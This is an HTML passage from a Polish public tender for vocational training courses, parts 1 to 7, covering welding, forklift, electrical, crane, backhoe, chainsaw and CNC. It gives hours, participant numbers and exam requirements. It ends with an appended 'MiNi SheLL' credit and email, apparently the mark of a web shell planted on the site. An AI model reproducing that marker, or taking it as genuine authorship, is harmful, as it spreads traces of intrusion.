<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursów spawania wg normy PN-EN ISO 4063 w zakresie spawania łukowego E-111 dla 16 uczniów i spawania w osłonie gazowej metodą MAG 135 dla 30 uczniów
Zakres szkolenia - kursy powinny odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia spawaczy. Kursy powinny zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci uczestnikom kursów egzamin zewnętrzny pod nadzorem Instytutu Spawalnictwa w Gliwicach. Koszty egzaminu wykonawca uwzględni w cenie ofertowej.
Wymiar godzin szkolenia/kursu - w zakresie spawania metodą E-111 -164 godziny zajęć teoretycznych i praktycznych a w zakresie spawania metodą MAG 135 - 146 godzin zajęć teoretycznych i praktycznych. 
Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę kursów winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami) oraz zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach. Wykonawca przedstawi w ofercie plany realizacji kursów na wzorze Zamawiającego (Załącznik nr 2 do SIWZ). Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników, wykonawca zobowiązany jest w ciągu 3 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogramy kursów. Kursy będą realizowane zgodnie z zaakceptowanym harmonogramem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu kierowcy/operatora wózka jezdniowego oraz bezpiecznej wymiany butli gazowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu kierowcy/operatora wózka jezdniowego oraz bezpiecznej wymiany butli gazowej dla 77 uczniów w 2 (dwóch) terminach. Dla grupy 41 uczniów szkolenie winno rozpocząć się w ciągu 7 dni od dnia podpisania umowy a dla grupy 36 osób szkolenie winno rozpocząć się w terminie przesuniętym o ok. 3 miesiące. W tym czasie uczniowie będą brali udział w innych szkoleniach zawodowych. 
Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia                        kierowców wózków jezdniowych oraz bezpiecznej wymiany butli gazowej. Kurs powinien zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci uczestnikom szkolenia egzamin zewnętrzny przed Komisją Kwalifikacyjną UDT a koszty egzaminu uwzględni w ofercie.
Wymiar godzin szkolenia/kursu - 67 godziny zajęć teoretycznych i praktycznych, w tym 20 godzin jazdy.
Plan realizacji szkolenia/kursu -   Program szkolenia określający szczegółową tematykę winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami) oraz zatwierdzony przez Urząd Dozoru Technicznego lub Ośrodek Doskonalenia Kadr nadzorowany przez Ministra właściwego do spraw Gospodarki w Mysłowicach. Wykonawca przedstawi w ofercie plan realizacji kursu na wzorze Zamawiającego (Załącznik nr 2 do SIWZ) Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników,  wykonawca zobowiązany jest w ciągu 3 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogram kursu dla pierwszej grupy - 41 uczniów. W terminie do 10 dni roboczych Wykonawca dostarczy Zamawiającemu harmonogram kursu dla drugiej grupy - 36 uczniów. Wykonawca otrzyma od Zamawiającego informacje o uczestnictwie uczniów w innych szkoleniach oraz o harmonogramach tych szkoleń nie później niż w ciągu 7 dni roboczych od dnia podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu w zakresie eksploatacji instalacji i urządzeń elektrycznych SEP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu w zakresie eksploatacji instalacji i urządzeń elektrycznych dla 18 uczniów
Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia w zakresie eksploatacji instalacji i urządzeń elektrycznych. Kurs powinien zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci egzamin zewnętrzny przed Komisją Kwalifikacyjną SEP a koszty egzaminu uwzględni w ofercie. 
Wymiar godzin szkolenia/kursu - 30 godzin zajęć teoretycznych i praktycznych
Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r.w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami) oraz zatwierdzony przez Stowarzyszenie Elektryków Polskich (SEP). Wykonawca przedstawi w ofercie plan realizacji kursu na wzorze Zamawiającego (Załącznik nr 2 do SIWZ). Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników (a w terminie nie dłuższym niż 7 dni roboczych od podpisania umowy informacji o uczestnictwie uczniów w innych szkoleniach zawodowych wraz z harmonogramami tych szkoleń), wykonawca zobowiązany jest w ciągu 10 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogram kursu, uwzględniający udział uczniów w innych szkoleniach zawodowych. Kurs będzie realizowany zgodnie z zaakceptowanym harmonogramem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu obsługi suwnic.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu obsługi suwnic sterowanych z kabiny I S dla 10 uczniów. 
Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia zawodowego operatorów suwnic. Kurs powinien zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci egzamin zewnętrzny przed Komisją Kwalifikacyjną UDT a koszty egzaminu uwzględni w cenie ofertowej.
Wymiar godzin szkolenia/kursu -  nie mniej niż 72 godziny zajęć teoretycznych i praktycznych.
Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami) oraz zatwierdzony przez UDT lub Ośrodek Doskonalenia Kadr nadzorowany przez Ministra właściwego do spraw Gospodarki w Mysłowicach. Wykonawca przedstawi w ofercie plan realizacji kursu na wzorze Zamawiającego (Załącznik nr 2 do SIWZ). Po podpisaniu umowy i otrzymaniu danych personalnych uczestników, wraz z informacjami na temat ich uczestnictwa w innych szkoleniach zawodowych, wykonawca zobowiązany jest w ciągu 5 dni roboczych dostarczyć Zamawiającemu do Biura Projektu proponowany harmonogram kursu. Harmonogram powinien uwzględniać udział uczniów w innych szkoleniach zawodowych. Kurs będzie realizowany zgodnie z zaakceptowanym harmonogramem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu operatora koparko-ładowarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu operatora koparko-ładowarki w zakresie III klasy uprawnień dla 29 uczniów.
Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia zawodowego dla operatorów koparko-ładowarki. Kurs powinien zakończyć się sprawdzianem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci egzamin zewnętrzny przed Komisją powołaną przez IMBiGS a koszty egzaminu uwzględni w cenie ofertowej.
Wymiar godzin szkolenia/kursu - 202 godziny w tym 86 godzin zajęć praktycznych.
Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami) oraz zatwierdzony przez Instytut Mechaniki Budownictwa i Górnictwa skalnego w Warszawie. Wykonawca przedstawi w ofercie plan realizacji kursu na wzorze Zamawiającego (Załącznik nr 2 do SIWZ) Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników,  wykonawca zobowiązany jest w ciągu 3 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogram kursu. Kurs będzie realizowany zgodnie z zaakceptowanym harmonogramem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu obsługi pilarki spalinowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu obsługi pilarki spalinowej dla 8 uczniów.
Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia zawodowego dla operatorów pilarki spalinowej. Kurs powinien zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. Wykonawca zorganizuje i opłaci uczestnikom szkolenia egzamin zewnętrzny przed Komisją powołaną przez miejscowo właściwe Nadleśnictwo LP a koszty egzaminu uwzględni w ofercie. 
Wymiar godzin szkolenia/kursu - 44 godziny zajęć teoretycznych i praktycznych.
Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami) oraz zatwierdzony przez Regionalną Dyrekcję Lasów Państwowych. Wykonawca przedstawi w ofercie plan realizacji kursu na wzorze Zamawiającego (Załącznik nr 2 do SIWZ) Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników (a w terminie 7 dni roboczych informacji o uczestnictwie uczniów w innych szkoleniach zawodowych wraz z harmonogramami tych szkoleń), wykonawca zobowiązany jest w ciągu 10 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogram kursu, który będzie uwzględniał udział uczniów w innych szkoleniach zawodowych. Kurs będzie realizowany zgodnie z zaakceptowanym harmonogramem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu programowania i obsługi obrabiarek CNC.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie kursu programowania i obsługi obrabiarek CNC sterowanych numerycznie na poziomie zaawansowanym dla 15 uczniów.
Zakres szkolenia - szkolenie powinno odbywać się zgodnie z obowiązującymi w przedmiocie zamówienia przepisami prawa oraz z przyjętymi standardami szkolenia zawodowego na poziomie zaawansowanym w zakresie programowania i obsługi obrabiarek CNC. Kurs powinien zakończyć się sprawdzeniem zdobytej wiedzy i umiejętności. 
Wymiar godzin szkolenia/kursu - 80 godzin zajęć teoretycznych i praktycznych.
Plan realizacji szkolenia/kursu - Program szkolenia określający szczegółową tematykę winien być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 3 lutego 2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006 r. Nr 31 poz. 216 ze zmianami).Wykonawca przedstawi w ofercie plan realizacji kursu na wzorze Zamawiającego (Załącznik nr 2 do SIWZ) Po podpisaniu umowy i otrzymaniu imiennego wykazu uczestników oraz informacji o uczestnictwie uczniów w innych szkoleniach zawodowych, wykonawca zobowiązany jest w ciągu 5 dni roboczych dostarczyć Zamawiającemu do Biura Projektu harmonogram kursu, uwzględniający udział uczniów w innych szkoleniach zawodowych. Kurs będzie realizowany zgodnie z zaakceptowanym harmonogramem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 35.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com